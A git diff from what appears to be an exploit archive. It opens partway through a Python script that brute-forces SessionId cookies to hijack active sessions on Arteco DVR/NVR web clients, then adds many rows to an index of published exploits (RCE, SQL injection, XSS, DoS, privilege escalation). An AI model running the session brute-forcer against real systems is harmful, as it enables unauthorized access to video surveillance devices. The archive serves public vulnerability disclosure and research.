range(100,1000) + + self.op = range(17129,17149) # Tweak + for j in self.op: + session=requests.session() + self.cookies=dict(SessionId=str(j)) + sys.stdout.write('[+] Trying ID: '+str(j)) + self.path='/arteco-mobile/' + self.cgi='camera.fcgi' + self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1' + self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers + if not 'artecomobile' in str(self.validate): + print(' - NOPE.') + else: + print(' - BINGO!!!') + print('[+] Active session found: '+str(j)) + print('[+] Use the cookie: SessionId='+str(j)) + exit(9) + print('[!] Sorry, no valid session found.') + + def main(self): + self.bro() + self.force() + +if __name__ == '__main__': + BrutusCookius().main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4f3656328..73af0a7a8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5252,6 +5252,7 @@ id,file,description,date,author,type,platform,port 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx, 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows, 43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows, +50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows, 43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows, 43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows, 43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows, @@ -6767,8 +6768,22 @@ id,file,description,date,author,type,platform,port 49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple, +49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows, +49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware, +49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware, +49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, +49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple, +49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, +49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, +49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows, +50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows, +50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows, 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, @@ -11279,6 +11294,9 @@ id,file,description,date,author,type,platform,port 49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows, +49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows, +49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows, 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",1970-01-01,"Paolo Stagno",local,windows, 49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows, 49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",1970-01-01,"Metin Yunus Kandemir",local,windows, @@ -11317,6 +11335,8 @@ id,file,description,date,author,type,platform,port 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",1970-01-01,"Geovanni Ruiz",local,windows, 50061,exploits/windows/local/50061.txt,"SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",1970-01-01,"Austin Babcock",local,windows, +49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",local,windows, +49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",local,ios, 49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, @@ -11326,6 +11346,7 @@ id,file,description,date,author,type,platform,port 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",1970-01-01,"J Smith",local,linux, 50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",1970-01-01,BRushiran,local,windows, +50014,exploits/windows/local/50014.txt,"Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path",1970-01-01,BRushiran,local,windows, 50023,exploits/windows/local/50023.txt,"Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50024,exploits/windows/local/50024.txt,"Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, @@ -11348,6 +11369,7 @@ id,file,description,date,author,type,platform,port 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python, 50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows, 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows, +50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, @@ -18475,6 +18497,8 @@ id,file,description,date,author,type,platform,port 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",1970-01-01,scryh,remote,linux, 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",1970-01-01,"Christopher Ellis",remote,java, 49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",1970-01-01,1F98D,remote,windows, +49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",1970-01-01,LiquidWorm,remote,hardware, +49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",1970-01-01,xynmaps,remote,multiple, 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple, 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple, 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux, @@ -18483,6 +18507,7 @@ id,file,description,date,author,type,platform,port 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware, +50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",1970-01-01,"Mohammed Hadi",remote,hardware, 50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",1970-01-01,"Nathaniel Singer",remote,solaris, 50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",1970-01-01,"Nehal Zaman",remote,android, 50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",1970-01-01,Gr33nh4t,remote,hardware, @@ -26033,8 +26058,10 @@ id,file,description,date,author,type,platform,port 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple, 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php, +50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php, 49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php, 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php, +49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple, 40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80 30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php, 18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",1970-01-01,n0tch,webapps,php, @@ -43734,7 +43761,9 @@ id,file,description,date,author,type,platform,port 49345,exploits/php/webapps/49345.txt,"CMS Made Simple 2.2.15 - RCE (Authenticated)",1970-01-01,"Andrey Stoykov",webapps,php, 49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",1970-01-01,icekam,webapps,php, 49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,multiple, +49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",1970-01-01,LiquidWorm,webapps,windows, 49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",1970-01-01,MoeAlBarbari,webapps,multiple, +49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",1970-01-01,"Kshitiz Raj",webapps,php, 49354,exploits/php/webapps/49354.txt,"WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS",1970-01-01,"Park Won Seok",webapps,php, 49355,exploits/php/webapps/49355.txt,"WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS",1970-01-01,"Park Won Seok",webapps,php, 49356,exploits/php/webapps/49356.txt,"Online Movie Streaming 1.0 - Authentication Bypass",1970-01-01,"Kshitiz Raj",webapps,php, @@ -43926,6 +43955,11 @@ id,file,description,date,author,type,platform,port 49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",1970-01-01,"numan türle",webapps,multiple, 49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware, +49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware, +49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware, +49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",1970-01-01,LiquidWorm,webapps,hardware, +49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, +49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",1970-01-01,"Richard Jones",webapps,php, 49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php, 49693,exploits/php/webapps/49693.php,"WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal",1970-01-01,"Nicholas Ferreira",webapps,php, @@ -43935,7 +43969,10 @@ id,file,description,date,author,type,platform,port 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware, +49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php, +49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php, +49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",1970-01-01,"Murat ŞEKER",webapps,php, 49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",1970-01-01,m0ze,webapps,php, 49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",1970-01-01,"Smriti Gaba",webapps,hardware, 49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",1970-01-01,"Quadron Research Lab",webapps,php, @@ -43957,6 +43994,7 @@ id,file,description,date,author,type,platform,port 49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",1970-01-01,"Michael Ikua",webapps,php, 49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",1970-01-01,gosh,webapps,windows, 49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",1970-01-01,gosh,webapps,windows, +49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion",1970-01-01,gosh,webapps,ios, 49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",1970-01-01,Captain_hook,webapps,multiple, 49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",1970-01-01,"Orion Hridoy",webapps,php, 49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",1970-01-01,"Rhino Security Labs",webapps,windows, @@ -43983,6 +44021,7 @@ id,file,description,date,author,type,platform,port 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ömer Hasan Durmuş",webapps,php, 49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,php, 49795,exploits/php/webapps/49795.txt,"RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Saud Ahmad",webapps,php, +49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",1970-01-01,"Vishwaraj Bhattrai",webapps,php, 49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",1970-01-01,Hato0,webapps,php, 49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, @@ -43993,6 +44032,7 @@ id,file,description,date,author,type,platform,port 49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",1970-01-01,Hex_26,webapps,perl, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php, 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, +49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python, 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php, @@ -44078,6 +44118,7 @@ id,file,description,date,author,type,platform,port 49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",1970-01-01,enox,webapps,ruby, 49955,exploits/hardware/webapps/49955.py,"OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)",1970-01-01,SecNigma,webapps,hardware, 49958,exploits/php/webapps/49958.txt,"WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hardik Solanki",webapps,php, +49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)",1970-01-01,enox,webapps,linux, 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",1970-01-01,enox,webapps,php, 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",1970-01-01,UnD3sc0n0c1d0,webapps,php, 49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,php, @@ -44107,6 +44148,7 @@ id,file,description,date,author,type,platform,port 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64, 50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",1970-01-01,"Fatih İLGİN",webapps,php, +50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - Authentication Bypass",1970-01-01,"Ron Jost",webapps,php, 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php, 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",1970-01-01,nhattruong,webapps,php, 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",1970-01-01,ahmed,webapps,php, @@ -44130,6 +44172,8 @@ id,file,description,date,author,type,platform,port 50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",1970-01-01,"Berk Can Geyikci",webapps,php, 50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",1970-01-01,"Berk Can Geyikci",webapps,php, 50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",1970-01-01,"Rinku Kumar",webapps,php, +50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,CHackA0101,webapps,multiple, +50460,exploits/php/webapps/50460.txt,"WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware, 50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux, @@ -44274,6 +44318,7 @@ id,file,description,date,author,type,platform,port 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php, 50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php, 50441,exploits/hardware/webapps/50441.py,"Hikvision Web Server Build 210702 - Command Injection",1970-01-01,bashis,webapps,hardware, +50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting",1970-01-01,a-rey,webapps,php, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple, 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, @@ -44290,6 +44335,7 @@ id,file,description,date,author,type,platform,port 50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware, 50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware, 50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, +50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection",1970-01-01,mari0x00,webapps,php, 50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php, 50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php, @@ -44304,6 +44350,8 @@ id,file,description,date,author,type,platform,port 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php, 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, +50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php, +50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, 50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50315,exploits/php/webapps/50315.py,"e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50316,exploits/php/webapps/50316.py,"OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)",1970-01-01,"Jake Ruston",webapps,php, @@ -44321,6 +44369,7 @@ id,file,description,date,author,type,platform,port 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication 